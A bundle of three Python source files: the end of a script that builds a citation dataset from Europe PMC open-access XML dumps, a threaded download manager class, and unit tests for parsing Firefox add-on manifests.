if ref_pmid is not None and self.articleids.__contains__(int(ref_pmid)):
row = self.articleids[int(ref_pmid)]
elif ref_pmcid is not None and self.articleids.__contains__(ref_pmcid):
row = self.articleids[ref_pmcid]
if row is not None and len(row):
if ref_pmid is None and row['PMID'] is not None:
ref_pmid = row['PMID']
if ref_pmcid is None and row['PMCID'] is not None:
ref_pmcid = row['PMCID']
if not ref_pmcid.startswith("PMC"):
ref_pmcid = "PMC{}".format(ref_pmcid)
if ref_doi is None and row['DOI'] is not None:
ref_doi = self.normalise_doi(str(row['DOI']))
# Create an object to store the reference
obj = {}
if entry_text is not None:
obj['entry_text'] = entry_text
if ref_pmid is not None:
obj['ref_pmid'] = str(ref_pmid)
if ref_pmcid is not None:
obj['ref_pmcid'] = ref_pmcid
if ref_doi is not None:
obj['ref_doi'] = ref_doi
if ref_url is not None:
obj['ref_url'] = ref_url
if ref_xmlid is not None:
obj['ref_xmlid'] = ref_xmlid
references_list.append(obj)
if self.writing_multiple_csv:
df = pd.DataFrame({
'cur_doi': [cur_doi],
'cur_pmid': [cur_pmid],
'cur_pmcid': [cur_pmcid],
'cur_name': [f.split("articles"+os.sep)[-1]],
'references': [json.dumps(references_list)]
})
df.to_csv(join(self.csv_file_path, "{}.csv".format(filename)), sep="\t", index=False)
else:
self.queue.put({
'cur_doi': cur_doi,
'cur_pmid': cur_pmid,
'cur_pmcid': cur_pmcid,
'cur_name': f,
'references': json.dumps(references_list)
})
except Exception as e:
os.makedirs(join(self.articles_path, 'exceptions'), exist_ok=True)
with open(join(self.articles_path, 'exceptions', filename), 'w') as fout:
with open(f, 'r') as fi:
for line in fi:
fout.write(line)
os.remove(f)
print("Exception {} with file: {}".format(e, f))
return
def process_articles(self, f):
articles_to_process = []
for dump_articles_folder in f:
for path, subdirs, files in os.walk(os.path.join(self.articles_path, dump_articles_folder)):
for name in files:
articles_to_process.append(os.path.join(path, name))
if not self.writing_multiple_csv:
consumer = Thread(target=self.write_to_csv)
consumer.setDaemon(True)
consumer.start()
with ThreadPool(self.process_article_threads) as pool:
list(tqdm.tqdm(pool.imap(self.worker_article, (fi for fi in articles_to_process)), total=len(articles_to_process)))
if not self.writing_multiple_csv:
self.queue.put("STOP")
consumer.join()
@staticmethod
def normalise_doi(doi_string) -> Optional[
str]: # taken from https://github.com/opencitations/index/blob/master/identifier/doimanager.py
if doi_string is not None:
try:
doi_string = re.sub("\0+", "", re.sub("\s+", "", unquote(doi_string[doi_string.index("10."):])))
return doi_string.lower().strip()
except ValueError:
return None
else:
return None
def worker_unzip_files(self, f: str) -> None:
try:
# Unzip
system("gunzip -k {}".format(join(self.pubmed_dump_file_path, f)))
# This is the new filename
gzip_name = f
f = f.replace(".gz", "")
# Create one file for each article, having its named
tree = etree.parse(join(self.pubmed_dump_file_path, f), etree.XMLParser(remove_blank_text=True))
# Extract all the article nodes
articles = tree.findall('article')
dump_articles_dir = os.path.join(self.articles_path, f.replace(".xml", ""))
os.makedirs(dump_articles_dir, exist_ok=True)
for i in range(self.folder_articles+1):
os.makedirs(os.path.join(dump_articles_dir, str(i)), exist_ok=True)
for i, cur_xml in enumerate(articles):
dir_of_article = os.path.join(dump_articles_dir, str(i % self.folder_articles))
with open(join(dir_of_article, "{}.xml".format(str(uuid.uuid4()))), 'w') as writefile:
writefile.write(etree.tostring(cur_xml, pretty_print=True, encoding='unicode'))
# Remove the downloaded dump
remove(join(self.pubmed_dump_file_path, f))
remove(join(self.pubmed_dump_file_path, gzip_name))
except Exception as e:
print("Exception during the extraction: {}".format(e))
system("rm {}{}*.xml".format(self.pubmed_dump_file_path,os.sep))
@staticmethod
def create_entry_xml(xml_ref): # Taken from CCC
entry_string = ""
el_citation = xml_ref.xpath("./element-citation | ./mixed-citation | ./citation")
if len(el_citation):
cur_el = el_citation[0]
is_element_citation = cur_el.tag == "element-citation" or cur_el.tag == "citation"
has_list_of_people = False
first_text_passed = False
for el in cur_el.xpath(".//node()"):
type_name = type(el).__name__
if type_name == "_Element":
cur_text = el.text
if cur_text is not None and " ".join(cur_text.split()) != "":
if first_text_passed:
is_in_person_group = len(el.xpath("ancestor::person-group")) > 0
if is_in_person_group:
entry_string += ", "
has_list_of_people = True
elif not is_in_person_group and has_list_of_people:
entry_string += ". "
has_list_of_people = False
else:
if is_element_citation:
entry_string += ", "
else:
entry_string += " "
else:
first_text_passed = True
if el.tag == "pub-id":
if el.xpath("./@pub-id-type = 'doi'"):
entry_string += "DOI: "
elif el.xpath("./@pub-id-type = 'pmid'"):
entry_string += "PMID: "
elif el.xpath("./@pub-id-type = 'pmcid'"):
entry_string += "PMC: "
elif type_name == "_ElementStringResult" or type_name == "_ElementUnicodeResult":
entry_string += el
del cur_el
del el
entry_string = " ".join(entry_string.split())
entry_string = re.sub(" ([,\.!\?;:])", "\\1", entry_string)
entry_string = re.sub("([\-–––]) ", "\\1", entry_string)
entry_string = re.sub("[\-–––,\.!\?;:] ?([\-–––,\.!\?;:])", "\\1", entry_string)
entry_string = re.sub("(\(\. ?)+", "(", entry_string)
entry_string = re.sub("(\( +)", "(", entry_string)
del el_citation
if entry_string is not None and entry_string != "":
return entry_string
else:
return None
@staticmethod
def get_id_from_xml_source(cur_xml, id_type):
"""This method extract an id_type from the XML"""
if id_type not in ["doi", "pmid", "pmcid"]:
print("Wrong id used: {}".format(id_type))
return None
id_string = cur_xml.xpath(".//front/article-meta/article-id[@pub-id-type='{}']".format(id_type))
if len(id_string):
id_string = u"" + etree.tostring(id_string[0], method="text", encoding='unicode').strip()
if id_string != "":
del cur_xml
toret = str(id_string)
del id_string
return toret
# Get list of file inside the dir
def _get_files_in_dir(self, path: str) -> list:
list_of_files = [f for f in listdir(path) if isfile(join(path, f))]
return list_of_files
def _get_articles_in_dir(self, path: str) -> list:
list_of_files = [f for f in listdir(path)]
return list_of_files
def _concatenate_datasets(self, path: str) -> str:
if self.writing_multiple_csv:
present_files = list(self._get_files_in_dir(path))
header_saved = False
if len(present_files) > 0:
print("\nConcatenating dataset")
start = time.time()
with open(join(path, 'dataset.csv'), 'w') as fout:
for f in tqdm.tqdm(present_files):
if f != "dataset.csv":
with open(join(path, f)) as fin:
header = next(fin)
if not header_saved:
fout.write(header)
header_saved = True
for line in fin:
fout.write(line)
os.remove(join(path, f))
df = pd.read_csv(join(path, 'dataset.csv'), sep='\t')
df.drop_duplicates(inplace=True)
df.to_csv(join(path, 'dataset.csv'), sep='\t', index=False)
end = time.time()
print("Time: {}".format((end - start)))
return join(path, 'dataset.csv')
def get_links_from_pubmed(self) -> list:
links = []
http = httplib2.Http(timeout=20)
try:
status, response = http.request('http://europepmc.org/ftp/oa/')
if status['status'] != '200':
raise Exception("response code {}".format(status['status']))
for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')):
if link.has_attr('href'):
if "xml.gz" in link['href']:
links.append(link['href'])
return links
except Exception as e:
print("Cannot get OA links: {}".format(e))
return []
def worker_download_links(args):
""" If something goes wrong, then wait 3 sec and retry until the max number of possible tries is reached """
todownload, pubmed_dump_file_path = args
downloaded = False
retry = 0
while not downloaded and retry < max_retry:
try:
wget.download('http://europepmc.org/ftp/oa/{}'.format(todownload), pubmed_dump_file_path)
downloaded = True
with open(os.path.join(pubmed_dump_file_path, '..', 'downloaded-dump.txt'), 'a') as index_file:
index_file.write(todownload + "\n")
except Exception as e:
print("\n(retry #{}) Problem with {}: {}".format(retry, todownload, e))
retry += 1
time.sleep(sec_between_retry)
if __name__ == '__main__':
e = EuropePubMedCentralDataset(start_path=start_path,
writing_multiple_csv=writing_multiple_csv,
skip_download=skip_download,
download_workers=download_workers,
unzip_threads=unzip_threads,
process_article_threads=process_article_threads,
max_file_to_download=max_file_to_download)
e.start()
|
DLManager.py
|
from .packer import Packer
import time, threading
from .DLError import DLUrlError
from .DLThreadPool import ThreadPool
import queue
from . import DLCommon as cv
from .DLProgress import TimeStatus
class Manager(Packer, object):
def __init__(self, daemon=False, max_task=2):
self.threads = ThreadPool(daemon)
self.tasks = {}
self._mapid = []
self._nameid = {}
self.max_task = max_task
self._queue = TaskQueue()
self._insp_thr = None
self._queue_lock = threading.RLock()
self._done_buff = []
self._trap_thrs = {}
self._url_excepts = queue.Queue()
self.status = TimeStatus()
def _inspector_thread(self):
while True:
if self.status.pausing() or self.status.isEnd():
self.checkRunQueue()
break
self.checkRunQueue()
self.run()
time.sleep(0.01)
def checkRunQueue(self):
with self._queue_lock:
for i in list(self._queue.run):
if self.tasks[i].isEnd():
self.tasks[i].close()
self._queue.run.remove(i)
self._queue.done.append(i)
self._done_buff.append(i)
elif self.tasks[i].isCritical():
self._queue.run.remove(i)
self._queue.critical.append(i)
if not self._queue.run and not self._queue.undone:
self.status.endGo()
self.status.endDone()
def isCritical(self):
return False
# if self.status.isEnd():
# return False
# critical = False
# for i in list(self.getAll().values()):
# if not i.isEnd() and i.isCritical():
# critical = True
# # else:
# return critical
# return True
def getExcept(self):
return list(self._url_excepts.queue)
def get(self, name=None, id=None):
if name is None and id is None:
return None
if id is not None:
return self.tasks[id]
if name is not None:
return self.tasks[self.getIdByName(name)]
def getAll(self):
return self.tasks
def getRunQueue(self):
return self._queue.run
def getPauseQueue(self):
return self._queue.pause
def getDoneQueue(self):
return self._queue.done
def getUndoneQueue(self):
return self._queue.undone
def getCriticalQueue(self):
return self._queue.critical
def getIdByName(self, name):
return self._nameid[name]
def getNameById(self, id):
for i, j in self._nameid.items():
if id == j:
return i
def addHandler(self, Handler, name=None):
with self._queue_lock:
id = self.newId()
name = id if not name else name
self.tasks[id] = Handler
self._nameid[name] = id
self._mapid[id] = True
self._queue.undone.append(id)
return id
def newId(self):
for i, j in enumerate(self._mapid):
if not j:
return i
else:
self._mapid.append(False)
return len(self._mapid) - 1
def remove(self, id):
with self._queue_lock:
del self.tasks[id]
self._mapid[id] = False
del self._nameid[self.getIdByName(id)]
def run(self, id=None):
with self._queue_lock:
if not self._insp_thr or self._insp_thr.isStoped():
self._insp_thr = self.threads.Thread(target=self._inspector_thread,
name=cv.MANAGER)
self._insp_thr.start()
if id is not None:
if len(self._queue.run) < self.max_task:
self.tasks[id].run()
self._queue.run.append(id)
else:
if not self.status.isStarted():
self.status.startGo()
for i in list(self._queue.undone):
self.status.startGo()
if len(self._queue.run) < self.max_task:
self.tasks[i].run()
self._queue.run.append(i)
# self._queue.pause.remove(i)
self._queue.undone.remove(i)
else:
break
def pause(self, id=None):
self._done_buff = []
if id is not None:
self.tasks[id].pause()
with self._queue_lock:
if id in self._queue.run:
self._queue.run.remove(id)
if id not in self._queue.pause:
self._queue.pause.append(id)
else:
self.status.startPause()
self._insp_thr.join()
for i in self._queue.run:
self.threads.Thread(target=self._pause, name='Nb-Manager-Pause', args=(i,)).start()
self.status.endPause()
shutdown = pause
def isPaused(self):
return self.status.isPaused()
isShutdown = isPaused
def _pause(self, id):
self.tasks[id].pause()
with self._queue_lock:
if id in self._queue.run:
self._queue.run.remove(id)
if id not in self._queue.pause:
self._queue.pause.append(id)
self.checkRunQueue()
def close(self):
pass
def join(self):
if self._insp_thr:
if not self._insp_thr:
raise RuntimeError('cannot join thread before it is started')
self._insp_thr.join()
for i, j in list(self.tasks.items()):
self.tasks[i].join()
def _trap_run(self):
for i in list(self._queue.run):
dl = self.tasks[i]
if id(dl) not in self._trap_thrs:
if not dl.isEnd():
thr = self.threads.Thread(target=self._trap, args=(dl,))
self._trap_thrs[id(dl)] = thr
thr.start()
def trap(self):
if not self._insp_thr:
raise RuntimeError('cannot join thread before it is started')
self._trap_run()
while self._trap_thrs or not self._url_excepts.empty():
self._trap_run()
if not self._url_excepts.empty():
_except = self._url_excepts.get(timeout=1)
raise _except
time.sleep(0.01)
self._insp_thr.join()
def _trap(self, task):
try:
task.trap()
except DLUrlError as e:
self._url_excepts.put(e)
del self._trap_thrs[id(task)]
def getAvgSpeed(self, id=None):
if id is not None:
return self.tasks[id].getAvgSpeed()
speed = 0
for i in self._queue.run:
if not self.tasks[i].isEnd():
speed += self.tasks[i].getAvgSpeed()
return speed
def getInsSpeed(self, id=None):
if id is not None:
return self.tasks[id].getInsSpeed()
speed = 0
for i in self._queue.run:
speed += self.tasks[i].getInsSpeed()
for i in list(self._done_buff):
tmp = self.tasks[i].getInsSpeed()
speed += tmp
if tmp < 100:
self._done_buff.remove(i)
# self._done_buff = []
return speed
def getIncByte(self, id=None):
if id is not None:
return self.tasks[id].getIncByte()
inc = 0
for i in self._queue.done:
inc += self.tasks[i].getFileSize()
for i in self._queue.run:
dl = self.tasks[i]
inc += dl.getFileSize() - dl.getLeft()
return inc
def getFileSize(self, id=None):
if id is not None:
return self.tasks[id].getFileSize()
return self.getTotalSize()
def getTotalSize(self):
size = 0
for i, j in self.tasks.items():
size += j.getFileSize()
return size
def getLeft(self, id=None):
if id is not None:
return self.tasks[id].getLeft()
left = 0
for i in self._queue.run:
if not self.tasks[i].isEnd():
left += self.tasks[i].getLeft()
for i in self._queue.undone:
left += self.tasks[i].getLeft()
return left
def isEnd(self, id=None):
if id is not None:
return self.tasks[id].isEnd()
else:
return self.status.isEnd()
def config(self, **kwargs):
for i, j in self.__config_params__():
if i in kwargs:
setattr(self, j, kwargs[i])
def __config_params__(self):
return [('max_task', 'max_task')]
def __packet_params__(self):
return ['tasks', 'max_task']
def unpack(self, packet):
Packer.unpack(self, packet)
class TaskQueue(object):
def __init__(self):
self.run = []
self.pause = []
self.undone = []
self.done = []
self.ready = []
self.critical = []
|
test_utils.py
|
import json
import os
import shutil
import tempfile
import time
import zipfile
import multiprocessing
import contextlib
from unittest import mock
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import ValidationError
from django.test.utils import override_settings
import lxml
import pytest
from defusedxml.common import NotSupportedError
from olympia import amo
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.tests.test_helpers import get_addon_file
from olympia.applications.models import AppVersion
from olympia.files import utils
pytestmark = pytest.mark.django_db
def _touch(fname):
open(fname, 'a').close()
os.utime(fname, None)
class AppVersionsMixin:
@classmethod
def setUpTestData(cls):
cls.create_webext_default_versions()
@classmethod
def create_appversion(cls, name, version):
return AppVersion.objects.get_or_create(
application=amo.APPS[name].id, version=version
)[0]
@classmethod
def create_webext_default_versions(cls):
cls.create_appversion('firefox', '36.0') # Incompatible with webexts.
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID)
cls.create_appversion('android', amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
cls.create_appversion('android', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
cls.create_appversion('android', amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_FIREFOX)
cls.create_appversion('android', amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_ANDROID)
class TestExtractor(AppVersionsMixin, TestCase):
def test_no_manifest(self):
fake_zip = utils.make_xpi({'dummy': 'dummy'})
with self.assertRaises(utils.NoManifestFound) as exc:
utils.Extractor.parse(fake_zip)
assert isinstance(exc.exception, forms.ValidationError)
assert exc.exception.message == ('No manifest.json found')
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
def test_parse_manifest_json(self, manifest_json_extractor):
fake_zip = utils.make_xpi({'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.os.path.getsize')
def test_static_theme_max_size(self, getsize_mock):
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE
manifest = utils.ManifestJSONExtractor('/fake_path', '{"theme": {}}').parse()
# Calling to check it doesn't raise.
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
# Increase the size though and it should raise an error.
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE + 1
with pytest.raises(forms.ValidationError) as exc:
utils.check_xpi_info(manifest, xpi_file=mock.Mock())
assert exc.value.message == 'Maximum size for WebExtension themes is 7.0 MB.'
# dpuble check only static themes are limited
manifest = utils.ManifestJSONExtractor('/fake_path', '{}').parse()
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
class TestManifestJSONExtractor(AppVersionsMixin, TestCase):
def parse(self, base_data):
return utils.ManifestJSONExtractor('/fake_path', json.dumps(base_data)).parse()
def test_instanciate_without_data(self):
"""Without data, we load the data from the file path."""
data = {'id': 'some-id'}
fake_zip = utils.make_xpi({'manifest.json': json.dumps(data)})
extractor = utils.ManifestJSONExtractor(zipfile.ZipFile(fake_zip))
assert extractor.data == data
def test_guid_from_applications(self):
"""Use applications>gecko>id for the guid."""
assert (
self.parse({'applications': {'gecko': {'id': 'some-id'}}})['guid']
== 'some-id'
)
def test_guid_from_browser_specific_settings(self):
"""Use applications>gecko>id for the guid."""
assert (
self.parse({'browser_specific_settings': {'gecko': {'id': 'some-id'}}})[
'guid'
]
== 'some-id'
)
def test_name_for_guid_if_no_id(self):
"""Don't use the name for the guid if there is no id."""
assert self.parse({'name': 'addon-name'})['guid'] is None
def test_type(self):
"""manifest.json addons are always ADDON_EXTENSION."""
assert self.parse({})['type'] == amo.ADDON_EXTENSION
def test_name(self):
"""Use name for the name."""
assert self.parse({'name': 'addon-name'})['name'] == 'addon-name'
def test_version(self):
"""Use version for the version."""
assert self.parse({'version': '23.0.1'})['version'] == '23.0.1'
def test_homepage(self):
"""Use homepage_url for the homepage."""
assert (
self.parse({'homepage_url': 'http://my-addon.org'})['homepage']
== 'http://my-addon.org'
)
def test_summary(self):
"""Use description for the summary."""
assert self.parse({'description': 'An addon.'})['summary'] == 'An addon.'
def test_invalid_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': 'A',
'id': '@invalid_strict_min_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == 'Lowest supported "strict_min_version" is 42.0.'
def test_unknown_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': '76.0',
'id': '@unknown_strict_min_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == ('Unknown "strict_min_version" 76.0 for Firefox')
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_max_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == ('Unknown "strict_max_version" 76.0 for Firefox')
def test_strict_min_version_needs_to_be_higher_than_42_if_specified(self):
"""strict_min_version needs to be higher than 42.0 if specified."""
data = {
'applications': {
'gecko': {
'strict_min_version': '36.0',
'id': '@too_old_strict_min_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == 'Lowest supported "strict_min_version" is 42.0.'
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '47.0')
firefox_max_version = self.create_appversion('firefox', '47.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=47.0',
'strict_max_version': '=47.*',
'id': '@random',
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min == firefox_min_version
assert app.max == firefox_max_version
# We have no way of specifying a different version for Android when an
# explicit version number is provided... That being said, we know that
# 47.0 is too low for Android, so we silently cap it at 48.0. That
# forces us to also change the max version for android.
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
def test_strict_min_version_100(self):
firefox_min_version = self.create_appversion('firefox', '100.0')
firefox_max_version = self.create_appversion('firefox', '100.*')
android_min_version = self.create_appversion('android', '100.0')
android_max_version = self.create_appversion('android', '100.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=100.0',
'strict_max_version': '=100.*',
'id': '@radioactive',
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
# But if 'browser_specific_settings' is used, it's higher min version.
data = {'browser_specific_settings': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
# And if mv3 then a higher min version again
data['manifest_version'] = 3
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_FIREFOX)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_ANDROID)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_is_webextension(self):
assert self.parse({})['is_webextension']
def test_allow_static_theme_waffle(self):
manifest = utils.ManifestJSONExtractor('/fake_path', '{"theme": {}}').parse()
utils.check_xpi_info(manifest)
assert self.parse({'theme': {}})['type'] == amo.ADDON_STATICTHEME
def test_extensions_dont_have_strict_compatibility(self):
assert self.parse({})['strict_compatibility'] is False
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_disallowed(self, resolve_message):
resolve_message.return_value = 'Notify Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(fixture, file_obj.file_path):
with pytest.raises(forms.ValidationError) as exc:
utils.parse_xpi(file_obj.file_path)
assert dict(exc.value.messages)['en-us'].startswith(
'Add-on names cannot contain the Mozilla or'
)
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_for_prefix_allowed(self, resolve_message):
resolve_message.return_value = 'Notify for Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(fixture, file_obj.file_path):
utils.parse_xpi(file_obj.file_path)
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
WebExtensions are allowed to omit `applications[/gecko]` and we
previously skipped defaulting to any `AppVersion` once this is not
defined. That resulted in none of our plattforms being selectable.
See https://github.com/mozilla/addons-server/issues/2586 and
probably many others.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_handle_utf_bom(self):
manifest = b'\xef\xbb\xbf{"manifest_version": 2, "name": "..."}'
parsed = utils.ManifestJSONExtractor(None, manifest).parse()
assert parsed['name'] == '...'
def test_raise_error_if_no_optional_id_support(self):
"""
We only support optional ids in Firefox 48+ and will throw an error
otherwise.
"""
data = {
'applications': {
'gecko': {
'strict_min_version': '42.0',
'strict_max_version': '49.0',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)['apps']
assert exc.value.message == 'Add-on ID is required for Firefox 47 and below.'
def test_comments_are_allowed(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description"
}
"""
manifest = utils.ManifestJSONExtractor('/fake_path', json_string).parse()
assert manifest['is_webextension'] is True
assert manifest.get('name') == 'My Extension'
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# We shouldn't skip adding specific apps to the WebExtension
# no matter any potential incompatibility, e.g
# browser_specific_settings is only supported from Firefox 48.0
# onwards, now if the user specifies strict_min_compat as 42.0
# we shouldn't skip the app because of that. Instead we override the
# value with the known min version that started supporting that.
data = {
'browser_specific_settings': {
'gecko': {'strict_min_version': '42.0', 'id': '@random'}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
def test_devtools_page(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description",
"devtools_page": "devtools/my-page.html"
}
"""
parsed_data = utils.ManifestJSONExtractor('/fake_path', json_string).parse()
assert parsed_data['devtools_page'] == 'devtools/my-page.html'
def test_version_not_string(self):
"""Test parsing doesn't fail if version is not a string - that error
should be handled downstream by the linter."""
data = {'version': 42}
assert self.parse(data)['version'] == '42'
data = {'version': 42.0}
assert self.parse(data)['version'] == '42.0'
# These are even worse, but what matters is that version stays a string
# in the result.
data = {'version': {}}
assert self.parse(data)['version'] == '{}'
data = {'version': []}
assert self.parse(data)['version'] == '[]'
data = {'version': None}
assert self.parse(data)['version'] == 'None'
class TestLanguagePackAndDictionaries(AppVersionsMixin, TestCase):
def test_parse_langpack(self):
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
self.create_appversion('android', '60.0')
self.create_appversion('android', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp',
}
},
'langpack_id': 'foo',
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)
).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '60.0'
assert apps[0].max.version == '60.*'
def test_parse_langpack_not_targeting_versions_explicitly(self):
data = {'applications': {'gecko': {'id': '@langp'}}, 'langpack_id': 'foo'}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)
).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '42.0'
# The linter should force the langpack to have a strict_max_version,
# so the value here doesn't matter much.
assert apps[0].max.version == '*'
def test_parse_dictionary(self):
self.create_appversion('firefox', '61.0')
data = {
'applications': {'gecko': {'id': '@dict'}},
'dictionaries': {'en-US': '/path/to/en-US.dic'},
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)
).parse()
assert parsed_data['type'] == amo.ADDON_DICT
assert parsed_data['strict_compatibility'] is False
assert parsed_data['is_webextension'] is True
assert parsed_data['target_locale'] == 'en-US'
apps = parsed_data['apps']
assert len(apps) == 1 # Dictionaries are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '61.0'
assert apps[0].max.version == '*'
def test_parse_broken_dictionary(self):
data = {'dictionaries': {}}
with self.assertRaises(forms.ValidationError):
utils.ManifestJSONExtractor('/fake_path', json.dumps(data)).parse()
def test_check_xpi_info_langpack_submission_restrictions(self):
user = user_factory()
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp',
}
},
'langpack_id': 'foo',
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path.xpi', json.dumps(data)
).parse()
with self.assertRaises(ValidationError):
# Regular users aren't allowed to submit langpacks.
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
# Shouldn't raise for users with proper permissions
self.grant_permission(user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
class TestManifestJSONExtractorStaticTheme(TestManifestJSONExtractor):
def parse(self, base_data):
if 'theme' not in base_data.keys():
base_data.update(theme={})
return super().parse(base_data)
def test_type(self):
assert self.parse({})['type'] == amo.ADDON_STATICTHEME
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
Override this because static themes have a higher default version.
"""
data = {}
apps = self.parse(data)['apps']
